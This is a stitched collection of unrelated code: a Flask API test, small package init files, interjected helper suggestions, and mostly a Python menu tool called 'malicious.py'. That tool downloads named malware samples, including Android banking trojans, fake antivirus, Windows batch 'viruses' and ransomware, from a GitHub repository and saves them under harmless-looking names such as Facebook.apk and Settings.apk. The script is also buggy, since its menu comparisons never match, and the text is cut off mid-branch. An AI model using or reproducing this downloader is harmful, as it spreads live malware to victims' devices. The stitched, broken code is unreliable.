def test_put_teams_id_not_found_error(flask_cli, init_api_teams):
"""Tests the API endpoint ``PUT /v1/teams`` with an unknown id."""
team_req = TeamReq(
init_api_teams[2]['identifier'], init_api_teams[2]['name'])
resp = flask_cli.put(
'/v1/teams/31337',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 404
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
def test_put_teams_identifier_not_found_error(flask_cli, init_api_teams):
"""Tests the API endpoint ``PUT /v1/teams`` with an unknown identifier."""
team_id = init_api_teams[2]['id']
team_req = TeamReq('identifier1337', init_api_teams[2]['name'])
resp = flask_cli.put(
f'/v1/teams/{team_id}',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 404
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
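The `helpers` module these tests import `compare_unsorted_list` from is not part of this chunk; a minimal implementation consistent with how the tests call it might look like this (an assumption, not the project's actual helper):

```python
def compare_unsorted_list(actual, expected, key):
    """Return True when both lists contain the same items, ignoring order.

    ``key`` extracts a sortable value (here the team ``id``) from each item.
    """
    if len(actual) != len(expected):
        return False
    return sorted(actual, key=key) == sorted(expected, key=key)
```

With this shape, `compare_unsorted_list(data, init_api_teams, lambda x: x['id'])` passes exactly when the response body holds the same teams as the fixture, in any order.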
# venv/Lib/site-packages/pygame_ai/__init__.py (repo: KamilLoska/HeroAttack, license: MIT)
from . import gameobject
from . import steering
from . import utils
# app/auth/__init__.py (repo: GinnyGaga/20171202flasky, license: MIT)
from flask import Blueprint
auth = Blueprint('auth', __name__)
from . import views
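For context, a blueprint created this way only serves requests once it is registered on an application; a self-contained sketch of that wiring (the `/login` route, `create_app` factory, and `/auth` prefix are illustrative assumptions, not from this repo):

```python
from flask import Blueprint, Flask

# Illustrative blueprint with one route; the real app defines its views elsewhere.
auth = Blueprint('auth', __name__)


@auth.route('/login')
def login():
    return 'login page'


def create_app():
    app = Flask(__name__)
    # Mount every blueprint route under /auth (the prefix is an assumption).
    app.register_blueprint(auth, url_prefix='/auth')
    return app
```

After registration the view is reachable at `/auth/login`, while the bare `/login` path stays unmapped.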
#!/usr/bin/python
# malicious.py (repo: Anonymous3-SIT/Malicious, license: MIT)
# -*- coding: utf-8 -*-
#####DONT CHANGE THIS########
import sys, os, platform
from time import *
x = platform.system()
import requests
from tqdm import tqdm
#--- Color ---#
W = '\033[0m' # white (default)
R = '\033[31m' # red
G = '\033[1;32m' # green bold
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
fun = "Download Succes ^_^"
now = strftime("%T")
bulan = strftime("%B")
tahun = strftime("%Y")
#--- Def menu ---#
def banner():
os.system('printf "\t\t_ _ ____ _ _ ____ _ ____ _ _ ____\n\t\t|\/| |__| | | | | | | | | [__ \n\t\t| | | | |___ | |___ | |__| |__| ___]\n\n" | lolcat')
#print(""+R+"I "+C+"████╗ ████║██╔══██╗██║ ██║██╔════╝██║██╔═══██╗██║ ██║██╔════╝ "+R+"I")
#print(""+R+"R "+C+"██╔████╔██║███████║██║ ██║██║ ██║██║ ██║██║ ██║███████╗ "+R+"R")
# print(""+R+"U "+C+"██║╚██╔╝██║██╔══██║██║ ██║██║ ██║██║ ██║██║ ██║╚════██║ "+R+"U")
# print(""+R+"S "+C+"██║ ╚═╝ ██║██║ ██║███████╗██║╚██████╗██║╚██████╔╝╚██████╔╝███████║ "+R+"S")
# print(""+R+"! "+C+"╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═════╝╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ "+R+"!")
def about():
print("\t\t"+B+"<<<<<<| "+R+"About Tool "+B+"|>>>>>>\n")
print("\t"+G+"Made"+B+" with full"+R+" <3"+B+"\t\t")
print("\tAuthor : Mr.TamfanX\t\t\t")
print("\tVersion : 1.1\t\t\t")
print("\tTeam : "+R+"Pem4lang Security")
print("\t"+B+"Thanks to SIT_GM")
menu()
def banner2():
print(""+O+"")
def fontcolor():
print(""+W+"")
#######DONT CHANGE THIS#########
#################### START ANDROID
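Every menu branch below repeats the same streaming-download logic; a deduplicated helper could replace it (a sketch; the `download_sample` name and the destination-directory handling are assumptions, not part of the original script):

```python
import os

import requests
from tqdm import tqdm


def download_sample(url, dest, chunk_size=1024):
    """Stream `url` to the local path `dest`, showing a tqdm progress bar."""
    r = requests.get(url, stream=True)
    size = int(r.headers['content-length'])
    tmp_name = url.split('/')[-1]
    with open(tmp_name, 'wb') as f:
        for data in tqdm(iterable=r.iter_content(chunk_size=chunk_size),
                         total=size / chunk_size, unit=' KB'):
            f.write(data)
    # Move into place without shelling out to `mv`, creating the folder if needed.
    os.makedirs(os.path.dirname(dest) or '.', exist_ok=True)
    os.replace(tmp_name, dest)
```

With this helper, each `elif` branch would reduce to a single call such as `download_sample(url, 'Android/Agent.apk')` followed by `print(fun)`.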
def Vandroid():
print(""+O+"["+R+"1"+O+"] Agent\t\t["+R+"15"+O+"] Elite\t\t["+R+"29"+O+"] Prasesfee")
print(""+O+"["+R+"2"+O+"] Badnews\t\t["+R+"16"+O+"] Omigo\t\t["+R+"30"+O+"] RecipeSmart")
print(""+O+"["+R+"3"+O+"] Bios\t\t["+R+"17"+O+"] Opfake\t\t["+R+"31"+O+"] Romaticpos")
print(""+O+"["+R+"4"+O+"] BlatanSMS\t\t["+R+"18"+O+"] SmsWorker\t\t["+R+"32"+O+"] Statetss")
print(""+O+"["+R+"5"+O+"] BrainTest\t\t["+R+"19"+O+"] Vietcon\t\t["+R+"33"+O+"] Thinking")
print(""+O+"["+R+"6"+O+"] Claco\t\t["+R+"20"+O+"] Candycorn\t\t["+R+"34"+O+"] Crd")
print(""+O+"["+R+"7"+O+"] DropDialer\t\t["+R+"21"+O+"] Cat\t\t["+R+"35"+O+"] Dendroid")
print(""+O+"["+R+"8"+O+"] FakeBank\t\t["+R+"22"+O+"] Chistescortos\t["+R+"36"+O+"] Ds")
print(""+O+"["+R+"9"+O+"] FakeCMCC\t\t["+R+"23"+O+"] Chistespicanticos\t["+R+"37"+O+"] Facebook")
print(""+O+"["+R+"10"+O+"] FakeDoc\t\t["+R+"24"+O+"] ComFunnys\t\t["+R+"38"+O+"] Fakeav")
print(""+O+"["+R+"11"+O+"] FakeValidation\t["+R+"25"+O+"] ComImagePets\t["+R+"39"+O+"] ArtStation")
print(""+O+"["+R+"12"+O+"] Fobus\t\t["+R+"26"+O+"] ComKitchen\t\t["+R+"40"+O+"] MusicPlayer")
print(""+O+"["+R+"13"+O+"] GinMaster\t\t["+R+"27"+O+"] ComLaughtter\t["+R+"41"+O+"] Settings")
print(""+O+"["+R+"14"+O+"] Masnu\t\t["+R+"28"+O+"] Prasesamor\t\t["+R+"42"+O+"] Back")
try:
menu1 = input("Input Number > "+R+"")
if menu1 == 1:#############done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Agent.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Agent.apk?raw=true' Android/Agent.apk")
print(fun)######done
elif menu1 == 2:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/BadNews.A.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'BadNews.A.apk?raw=true' Android/BadNews.apk")
print(fun)#######done
elif menu1 == 3:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Bios.NativeMaliciousCode.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Bios.NativeMaliciousCode.apk?raw=true' Android/Bios.apk")
print(fun)#####done
elif menu1 == 4:########done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Blatantsms.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Blatantsms.apk?raw=true' Android/Blatantsms.apk")
print(fun)#####done
elif menu1 == 5:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/BrainTest.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'BrainTest.apk?raw=true' Android/BrainTest.apk")
print(fun)#####done
elif menu1 == 6:##########done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Claco.A.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Claco.A.apk?raw=true' Android/Claco.apk")
print(fun)#####done
elif menu1 == 7:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Dropdialer.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Dropdialer.apk?raw=true' Android/DropDialer.apk")
print(fun)#####done
elif menu1 == 8:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeBank.B.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'FakeBank.B.apk?raw=true' Android/FakeBank.apk")
print(fun)#####done
elif menu1 == 9:######done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeCMCC.A.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'FakeCMCC.A.apk?raw=true' Android/FakeCMCC.apk")
print(fun)#####done
elif menu1 == 10:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeDoc.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'FakeDoc.apk?raw=true' Android/FakeDoc.apk")
print(fun)#####done
elif menu1 == 11:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeValidation.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'FakeValidation.apk?raw=true' Android/FakeValidation.apk")
print(fun)#####done
elif menu1 == 12:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Fobus.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Fobus.apk?raw=true' Android/Fobus.apk")
print(fun)#####done
elif menu1 == 13:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/GinMaster.Z.AdvancedObfuscation.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'GinMaster.Z.AdvancedObfuscation.apk?raw=true' Android/GinMaster.apk")
print(fun)#####done
elif menu1 == 14:###done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Masnu.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Masnu.apk?raw=true' Android/Masnu.apk")
print(fun)#####done
elif menu1 == 15:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Minecraft2.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Minecraft2.apk?raw=true' Android/Elite.apk")
print(fun)#####done
elif menu1 == 16:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Omigo.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Omigo.apk?raw=true' Android/Omigo.apk")
print(fun)#####done
elif menu1 == 17:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Opfake.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Opfake.apk?raw=true' Android/Opfake.apk")
print(fun)#####done
elif menu1 == 18:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/SmsWorker.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'SmsWorker.apk?raw=true' Android/SmsWorker.apk")
print(fun)#####done
elif menu1 == 19:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Vietcon.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Vietcon.apk?raw=true' Android/Vietcon.apk")
print(fun)#####done
elif menu1 == 20:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/candy_corn.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'candy_corn.apk?raw=true' Android/Candycorn.apk")
print(fun)#####done
elif menu1 == 21:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/cat.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'cat.apk?raw=true' Android/Cat.apk")
print(fun)#####done
elif menu1 == 22:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/chistescortos.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'chistescortos.apk?raw=true' Android/Chistescortos.apk")
print(fun)#####done
elif menu1 == 23:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/chistespicanticos.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'chistespicanticos.apk?raw=true' Android/Chistespicanticos.apk")
print(fun)#####done
elif menu1 == 24:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.funnyys.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.funnyys.apk?raw=true' Android/ComFunnys.apk")
print(fun)#####done
elif menu1 == 25:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.imagepets.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.imagepets.apk?raw=true' Android/ComImagePets.apk")
print(fun)#####done
elif menu1 == 26:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.kitchenn.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.kitchenn.apk?raw=true' Android/ComKitchen.apk")
print(fun)#####done
elif menu1 == 27:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.laughtter.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.laughtter.apk?raw=true' Android/ComLaughtter.apk")
print(fun)#####done
elif menu1 == 28:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.prasesamor.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.prasesamor.apk?raw=true' Android/Prasesamor.apk")
print(fun)#####done
elif menu1 == 29:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.prasesfee.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.prasesfee.apk?raw=true' Android/Prasesfee.apk")
print(fun)#####done
elif menu1 == 30:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.recipesmart.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.recipesmart.apk?raw=true' Android/Recipesmart.apk")
print(fun)#####done
elif menu1 == 31:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.romaticpos.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.romaticpos.apk?raw=true' Android/Romaticpos.apk")
print(fun)#####done
elif menu1 == 32:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.statetss.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.statetss.apk?raw=true' Android/Statetss.apk")
print(fun)#####done
elif menu1 == 33:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.thinkking.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.thinkking.apk?raw=true' Android/Thinkking.apk")
print(fun)#####done
elif menu1 == 34:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/crd.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'crd.apk?raw=true' Android/Crd.apk")
print(fun)#####done
elif menu1 == 35:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/dendroid.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'dendroid.apk?raw=true' Android/Dendroid.apk")
print(fun)#####done
elif menu1 == 36:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ds.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'ds.apk?raw=true' Android/Ds.apk")
print(fun)#####done
elif menu1 == 37:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/facebook.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'facebook.apk?raw=true' Android/Facebook.apk")
print(fun)#####done
elif menu1 == 38:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Fake_av.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Fake_av.apk?raw=true' Android/Fakeav.apk")
print(fun)#####done
elif menu1 == 39:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ArtStation.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'ArtStation.apk?raw=true' Android/ArtStation.apk")
print(fun)#####done
elif menu1 == 40:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Adware.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Adware.apk?raw=true' Android/MusicPlayerAdware.apk")
print(fun)#####done
elif menu1 == 41:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Settings.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Settings.apk?raw=true' Android/Settings.apk")
print(fun)#####done
elif menu1 == 42:####done
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
#################ANDROID DONE
#################Start Macosx
def Vmacosx():
print(""+O+"["+R+"1"+O+"] Trinoids")
print(""+O+"["+R+"2"+O+"] Nothing")
print(""+O+"["+R+"3"+O+"] Back")
try:
menu2 = input("Input number > "+R+"")
if menu2 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/trinoids.app?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'trinoids.app?raw=true' Macosx/Trinoids.app")
print(fun)#####done
elif menu2 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/nothing.app?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'nothing.app?raw=true' Macosx/Nothing.app")
print(fun)#####done
elif menu2 == 3:
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
####################Done Macosx
###################Start PC
def vpcwin():
print(""+O+"["+R+"1"+O+"] Ugly.bat\t\t["+R+"5"+O+"] Koce.bat\t\t["+R+"9"+O+"] Ransomeware")
print(""+O+"["+R+"2"+O+"] Sleepy.bat\t\t["+R+"6"+O+"] Cmd.bat\t\t["+R+"10"+O+"] Rip.bat")
print(""+O+"["+R+"3"+O+"] Reg-eater.bat\t["+R+"7"+O+"] Capslock.vbs\t["+R+"11"+O+"] Back")
print(""+O+"["+R+"4"+O+"] Kuis.bat\t\t["+R+"8"+O+"] Alay.vbs")
try:
menu3 = input("Input number > "+R+"")
if menu3 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ugly.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'ugly.bat?raw=true' Windows/Ugly.bat")
print(fun)#####done
elif menu3 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/sleepy.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'sleepy.bat?raw=true' Windows/Sleepy.bat")
print(fun)#####done
elif menu3 == 3:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/reg-eater.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
